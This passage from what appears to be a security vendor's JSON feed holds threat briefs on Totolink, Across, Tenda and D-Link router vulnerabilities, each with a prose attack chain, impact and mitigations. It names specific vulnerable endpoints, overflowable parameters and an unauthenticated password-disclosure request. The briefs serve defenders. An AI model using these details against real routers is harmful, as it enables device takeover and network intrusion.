Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6157"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6157","buffer-overflow","router","iot"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-6157, has been discovered in Totolink A800R routers running firmware version 4.1.2cu.5137_B20200730. The vulnerability resides within the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function in the \u003ccode\u003e/lib/cste_modules/app.so\u003c/code\u003e library. Successful exploitation allows remote attackers to potentially execute arbitrary code on the device. Publicly available exploits exist, increasing the risk of widespread exploitation. Routers are often the perimeter defense for networks making them lucrative targets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink A800R router with firmware version 4.1.2cu.5137_B20200730 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes an overly long string as the value for the \u003ccode\u003eapcliSsid\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe router receives the HTTP request and passes the \u003ccode\u003eapcliSsid\u003c/code\u003e argument to the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function copies the contents of \u003ccode\u003eapcliSsid\u003c/code\u003e into a fixed-size buffer without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe overly long \u003ccode\u003eapcliSsid\u003c/code\u003e string overflows the buffer, overwriting adjacent memory locations.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflowed data to overwrite the return address of the function.\u003c/li\u003e\n\u003cli\u003eWhen the function returns, control is transferred to the attacker\u0026rsquo;s code, leading to arbitrary code execution. This could lead to the installation of malware or complete control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability grants the attacker the ability to execute arbitrary code on the affected Totolink A800R router. This can result in complete compromise of the device, enabling the attacker to intercept network traffic, modify router settings, or use the router as a launching point for further attacks within the network. Given the availability of public exploits, a large number of devices could be vulnerable, making this a high-impact threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available firmware updates from Totolink to patch CVE-2026-6157.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious HTTP requests targeting the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function, as described in the attack chain. Deploy the provided Sigma rule to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eIf updates are unavailable, consider replacing the vulnerable device.\u003c/li\u003e\n\u003cli\u003eDisable remote management access to the router to reduce the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-13T04:26:40Z","date_published":"2026-04-13T04:26:40Z","id":"/briefs/2026-04-totolink-a800r-buffer-overflow/","summary":"A remote buffer overflow vulnerability exists in the Totolink A800R router version 4.1.2cu.5137_B20200730, allowing unauthenticated attackers to potentially execute arbitrary code by overflowing the apcliSsid argument in the setAppEasyWizardConfig function within the /lib/cste_modules/app.so library.","title":"Totolink A800R Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-a800r-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2019-25706"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2019-25706","file-disclosure","router","network"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Across DR-810 router contains an unauthenticated file disclosure vulnerability (CVE-2019-25706) that allows remote attackers to retrieve sensitive information. By sending a simple GET request to the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint, an attacker can download a backup file containing router passwords, configuration details, and potentially other sensitive data. This vulnerability exists because the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint does not require authentication, allowing anyone with network access to the router to retrieve the backup file. Successful exploitation leads to complete compromise of the device\u0026rsquo;s configuration and potential lateral movement within the network if credentials are reused. This vulnerability was published on 2026-04-12.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an Across DR-810 router exposed on the network.\u003c/li\u003e\n\u003cli\u003eAttacker crafts an HTTP GET request targeting the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe router responds with the \u003ccode\u003erom-0\u003c/code\u003e backup file without requiring authentication.\u003c/li\u003e\n\u003cli\u003eAttacker downloads the \u003ccode\u003erom-0\u003c/code\u003e backup file.\u003c/li\u003e\n\u003cli\u003eAttacker decompresses the downloaded \u003ccode\u003erom-0\u003c/code\u003e file, which is likely compressed to reduce size.\u003c/li\u003e\n\u003cli\u003eThe attacker parses the decompressed file to extract sensitive information such as router passwords.\u003c/li\u003e\n\u003cli\u003eAttacker uses the extracted router passwords to gain administrative access to the router\u0026rsquo;s web interface.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to retrieve sensitive information, including router passwords and configuration data. This can lead to complete compromise of the affected router. An attacker can then modify router settings, intercept network traffic, or potentially use the compromised router as a pivot point to access other systems on the network. If the router passwords are reused across multiple systems, the impact could extend beyond the compromised router, affecting other devices and services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint on Across DR-810 routers to detect potential exploitation attempts using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eInspect network traffic for unusual downloads from Across DR-810 routers, focusing on responses from the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eBlock access to the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint on Across DR-810 routers via firewall rules to prevent unauthorized access.\u003c/li\u003e\n\u003cli\u003eReview the provided reference URLs for additional context and potential mitigation strategies.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T13:16:33Z","date_published":"2026-04-12T13:16:33Z","id":"/briefs/2026-04-across-dr810-file-disclosure/","summary":"Across DR-810 routers are vulnerable to unauthenticated file disclosure, allowing remote attackers to download the rom-0 backup file containing sensitive information, such as router passwords and configuration data, via a simple GET request to the rom-0 endpoint.","title":"Across DR-810 Unauthenticated File Disclosure Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-across-dr810-file-disclosure/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6120"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer-overflow","cve-2026-6120","iot"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda F451 router firmware version 1.0.0.7. The vulnerability resides in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function within the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e component\u0026rsquo;s httpd service. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious \u003ccode\u003epage\u003c/code\u003e argument. This can lead to arbitrary code execution on the device. Given the public availability of the exploit (CVE-2026-6120), Tenda F451 routers are at immediate risk of compromise if not properly secured. This vulnerability poses a significant threat due to the widespread use of Tenda routers in home and small office environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda F451 router running vulnerable firmware version 1.0.0.7.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP GET or POST request targeting the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003epage\u003c/code\u003e argument with a string exceeding the buffer size allocated for it in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e service on the router receives the malicious request and passes the \u003ccode\u003epage\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromDhcpListClient\u003c/code\u003e function attempts to copy the oversized \u003ccode\u003epage\u003c/code\u003e argument into a fixed-size buffer on the stack, causing a buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent stack memory, including the return address of the function.\u003c/li\u003e\n\u003cli\u003eThe attacker controls the overwritten return address, redirecting execution to attacker-controlled code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially leading to complete device compromise and network access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of the Tenda F451 router. This allows attackers to control the device, intercept network traffic, change DNS settings, inject malicious scripts into web pages served to connected devices, or use the router as a pivot point for further attacks within the network. This vulnerability affects all users of the Tenda F451 router running firmware version 1.0.0.7, potentially impacting thousands of devices globally. Given the high CVSS score of 8.8, the risk is substantial.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint, especially those with unusually long \u003ccode\u003epage\u003c/code\u003e parameters (refer to the rule \u003ccode\u003eTenda F451 Suspicious URI Length\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eInspect network traffic for abnormal patterns related to compromised routers (unusual DNS requests, connections to known malicious IPs).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting and input validation on web server endpoints where possible to mitigate buffer overflow attempts.\u003c/li\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-6120, although patches may not be available.\u003c/li\u003e\n\u003cli\u003eConsider deploying network intrusion detection systems (NIDS) to identify and block exploitation attempts (refer to the \u003ccode\u003eTenda F451 Buffer Overflow Attempt\u003c/code\u003e rule).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T12:00:00Z","date_published":"2026-04-12T12:00:00Z","id":"/briefs/2026-04-tenda-f451-bo/","summary":"A remote stack-based buffer overflow vulnerability exists in the fromDhcpListClient function of the /goform/DhcpListClient component (httpd) within Tenda F451 firmware version 1.0.0.7, triggered by manipulating the 'page' argument, potentially allowing for arbitrary code execution.","title":"Tenda F451 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f451-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6122"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6122","buffer-overflow","router","tenda"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability has been identified in Tenda F451 router version 1.0.0.7. The vulnerability resides within the \u003ccode\u003efrmL7ProtForm\u003c/code\u003e function of the \u003ccode\u003e/goform/L7Prot\u003c/code\u003e component, specifically within the \u003ccode\u003ehttpd\u003c/code\u003e service. A remote attacker can exploit this flaw by crafting a malicious request targeting the \u003ccode\u003epage\u003c/code\u003e argument. Successful exploitation allows the attacker to execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat to affected devices, potentially leading to full device compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda F451 router running firmware version 1.0.0.7.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP GET or POST request targeting the \u003ccode\u003e/goform/L7Prot\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes the \u003ccode\u003epage\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it within the \u003ccode\u003efrmL7ProtForm\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e service processes the request without proper bounds checking on the \u003ccode\u003epage\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized payload overflows the stack buffer during the execution of the \u003ccode\u003efrmL7ProtForm\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory regions on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled return address redirects execution to attacker-supplied code or a return-oriented programming (ROP) chain.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda F451 router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the device as a bot in a botnet. Given the availability of public exploits, vulnerable devices are at high risk of compromise. The number of potentially affected devices is substantial, as the Tenda F451 is a widely used router model.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/goform/L7Prot\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters, deploying the Sigma rule \u003ccode\u003eDetect Tenda F451 Buffer Overflow Attempt\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eSince no patch is available, consider replacing the Tenda F451 1.0.0.7 with a more secure router or firewall solution.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router on other network devices.\u003c/li\u003e\n\u003cli\u003eDisable remote administration access to the router to reduce the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T08:16:37Z","date_published":"2026-04-12T08:16:37Z","id":"/briefs/2026-04-tenda-f451-overflow/","summary":"Tenda F451 router version 1.0.0.7 is vulnerable to a stack-based buffer overflow in the frmL7ProtForm function, enabling remote attackers to execute arbitrary code by manipulating the 'page' argument.","title":"Tenda F451 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f451-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6121"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6121","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-6121 is a stack-based buffer overflow vulnerability affecting Tenda F451 router version 1.0.0.7. The vulnerability resides within the \u003ccode\u003eWrlclientSet\u003c/code\u003e function located in the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e file of the \u003ccode\u003ehttpd\u003c/code\u003e component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the affected router, specifically manipulating the \u003ccode\u003eGO\u003c/code\u003e argument. Due to insufficient bounds checking on the \u003ccode\u003eGO\u003c/code\u003e argument\u0026rsquo;s size when passed to the \u003ccode\u003eWrlclientSet\u003c/code\u003e function, an attacker can write beyond the allocated buffer on the stack, potentially leading to arbitrary code execution. Publicly available exploits exist, increasing the risk of widespread exploitation. Routers that are accessible from the internet are at highest risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda F451 router version 1.0.0.7 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the HTTP POST request, the attacker includes the \u003ccode\u003eGO\u003c/code\u003e argument, filling it with a payload exceeding the buffer size allocated for it within the \u003ccode\u003eWrlclientSet\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e component of the Tenda F451 router receives the HTTP request and passes the \u003ccode\u003eGO\u003c/code\u003e argument to the vulnerable \u003ccode\u003eWrlclientSet\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the buffer overflow, the attacker\u0026rsquo;s payload overwrites adjacent memory locations on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload overwrites the return address on the stack, redirecting execution flow to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process, allowing the attacker to perform actions such as modifying router configuration, executing system commands, or establishing a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the router and potentially the internal network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6121 can lead to complete compromise of the affected Tenda F451 router. An attacker can gain unauthorized access to the device\u0026rsquo;s configuration, potentially modifying DNS settings, firewall rules, or other critical parameters. This can lead to redirection of user traffic, denial-of-service attacks, or the establishment of a foothold within the targeted network for further malicious activities. Given the ease of exploitation due to the publicly available exploit code, a large number of Tenda F451 routers could be compromised.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e with abnormally long \u003ccode\u003eGO\u003c/code\u003e parameter values to detect potential exploitation attempts (see Sigma rule below and enable webserver logging).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting for requests to the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint to mitigate potential brute-force exploitation attempts (configure your firewall or WAF).\u003c/li\u003e\n\u003cli\u003eUpgrade to a patched firmware version when available or replace the affected devices, if the vendor does not provide a fix.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T08:16:36Z","date_published":"2026-04-12T08:16:36Z","id":"/briefs/2026-04-tenda-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-6121) exists in the WrlclientSet function of the /goform/WrlclientSet file in the httpd component of Tenda F451 version 1.0.0.7, allowing remote attackers to execute arbitrary code by manipulating the GO argument.","title":"Tenda F451 Stack-Based Buffer Overflow Vulnerability (CVE-2026-6121)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5989"}],"_cs_exploited":true,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer_overflow","rce"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eA critical vulnerability, identified as CVE-2026-5989, affects the Tenda F451 router, specifically version 1.0.0.7. The vulnerability lies within the \u003ccode\u003efromRouteStatic\u003c/code\u003e function of the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e file. By manipulating the \u003ccode\u003epage\u003c/code\u003e argument, a remote attacker can trigger a stack-based buffer overflow, potentially leading to arbitrary code execution. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat as it allows unauthenticated remote attackers to compromise the router, potentially leading to network disruption, data theft, or use of the device in botnet activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda F451 router (version 1.0.0.7) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes a \u003ccode\u003epage\u003c/code\u003e argument with a payload designed to overflow the stack buffer in the \u003ccode\u003efromRouteStatic\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003efromRouteStatic\u003c/code\u003e function processes the malicious \u003ccode\u003epage\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eUpon function return, control is redirected to the attacker-controlled memory region.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code injected into the overflowed buffer, such as downloading and executing a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the router, potentially allowing further exploitation or network compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5989 allows an attacker to gain complete control of the Tenda F451 router. This can lead to a variety of damaging outcomes, including denial-of-service attacks against the local network, interception of network traffic, modification of router settings, and the potential use of the compromised router as a node in a botnet. Given the widespread use of Tenda routers in home and small business environments, a large number of devices could be at risk if this vulnerability is actively exploited.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e containing abnormally long \u003ccode\u003epage\u003c/code\u003e arguments, as this is indicative of potential exploit attempts. Deploy the Sigma rule \u003ccode\u003eDetect Tenda F451 Exploit Attempt\u003c/code\u003e to detect these malicious requests.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on requests to the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e endpoint to mitigate potential denial-of-service attacks.\u003c/li\u003e\n\u003cli\u003eSince there is no patch available, consider replacing vulnerable Tenda F451 routers with more secure devices from other vendors.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T00:16:36Z","date_published":"2026-04-10T00:16:36Z","id":"/briefs/2026-04-tenda-rce/","summary":"A stack-based buffer overflow vulnerability in the Tenda F451 router (version 1.0.0.7) allows remote attackers to execute arbitrary code by manipulating the 'page' argument in the fromRouteStatic function of the /goform/RouteStatic file.","title":"Tenda F451 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5980"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","buffer_overflow","router","d-link"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5980 is a critical buffer overflow vulnerability affecting the D-Link DIR-605L router, specifically version 2.13B01. The vulnerability resides in the \u003ccode\u003eformSetMACFilter\u003c/code\u003e function within the \u003ccode\u003e/goform/formSetMACFilter\u003c/code\u003e component\u0026rsquo;s POST Request Handler. A remote attacker can exploit this by sending a crafted POST request with a malicious \u003ccode\u003ecurTime\u003c/code\u003e argument, leading to a buffer overflow. Exploit code is publicly available. Due to the product\u0026rsquo;s end-of-life status, no patch is available, making unpatched devices highly vulnerable. This allows for potential remote code execution and complete compromise of the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-605L router (version 2.13B01) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/goform/formSetMACFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003ecurTime\u003c/code\u003e parameter, injecting a string exceeding the buffer\u0026rsquo;s expected size.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003eformSetMACFilter\u003c/code\u003e function processes the POST request without proper bounds checking on the \u003ccode\u003ecurTime\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003ecurTime\u003c/code\u003e string overflows the buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite critical data, such as return addresses or function pointers.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003eformSetMACFilter\u003c/code\u003e function attempts to return, the overwritten return address is used, redirecting execution to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially installing malware, changing configurations, or using the device for further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5980 allows a remote attacker to gain complete control over the vulnerable D-Link DIR-605L router. Given that the affected product is no longer supported, a large number of legacy routers remain vulnerable. Attackers can leverage compromised routers to establish botnets, conduct man-in-the-middle attacks, or gain unauthorized access to internal networks connected to the router. The lack of patches elevates the severity, as affected users have no direct mitigation available other than replacing the device.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect D-Link DIR-605L Buffer Overflow Attempt\u003c/code\u003e to identify malicious POST requests targeting the \u003ccode\u003e/goform/formSetMACFilter\u003c/code\u003e endpoint on D-Link DIR-605L devices.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to isolate potentially vulnerable D-Link DIR-605L routers to limit the impact of a successful compromise.\u003c/li\u003e\n\u003cli\u003eIf possible, replace D-Link DIR-605L routers (version 2.13B01) with newer, supported devices to eliminate the vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T21:16:14Z","date_published":"2026-04-09T21:16:14Z","id":"/briefs/2026-04-dlink-dir605l-buffer-overflow/","summary":"A buffer overflow vulnerability exists in the D-Link DIR-605L router version 2.13B01, allowing a remote attacker to execute arbitrary code by manipulating the `curTime` argument in the `formSetMACFilter` function.","title":"D-Link DIR-605L Router Buffer Overflow Vulnerability (CVE-2026-5980)","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-dir605l-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5979"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["dlink","router","buffer_overflow","cve-2026-5979"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA buffer overflow vulnerability, CVE-2026-5979, has been identified in D-Link DIR-605L router with firmware version 2.13B01. The vulnerability resides in the \u003ccode\u003eformVirtualServ\u003c/code\u003e function within the \u003ccode\u003e/goform/formVirtualServ\u003c/code\u003e component, specifically within the POST request handler. By manipulating the \u003ccode\u003ecurTime\u003c/code\u003e argument, a remote attacker can trigger a buffer overflow. According to the NVD, an exploit is publicly available, increasing the risk of exploitation. This vulnerability affects end-of-life products, making patching impossible.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable D-Link DIR-605L router running firmware 2.13B01.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/formVirtualServ\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes the \u003ccode\u003ecurTime\u003c/code\u003e argument with a value exceeding the buffer\u0026rsquo;s capacity.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003eformVirtualServ\u003c/code\u003e function processes the POST request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003ecurTime\u003c/code\u003e value overwrites adjacent memory regions on the stack or heap.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow payload to overwrite the return address.\u003c/li\u003e\n\u003cli\u003eUpon returning from the \u003ccode\u003eformVirtualServ\u003c/code\u003e function, control is transferred to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining full control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability (CVE-2026-5979) can lead to complete compromise of the D-Link DIR-605L router. Attackers could potentially execute arbitrary code, enabling them to modify router settings, intercept network traffic, or use the compromised device as a pivot point for further attacks within the network. Due to the product being end-of-life, a patch is not available. The number of vulnerable devices is unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor webserver logs for requests to \u003ccode\u003e/goform/formVirtualServ\u003c/code\u003e with unusually long \u003ccode\u003ecurTime\u003c/code\u003e parameters to detect potential exploitation attempts (see Sigma rule \u0026ldquo;Detect Suspiciously Long curTime Parameter in D-Link Routers\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect suspicious traffic patterns associated with buffer overflow exploits targeting web interfaces.\u003c/li\u003e\n\u003cli\u003eSince this device is end-of-life, 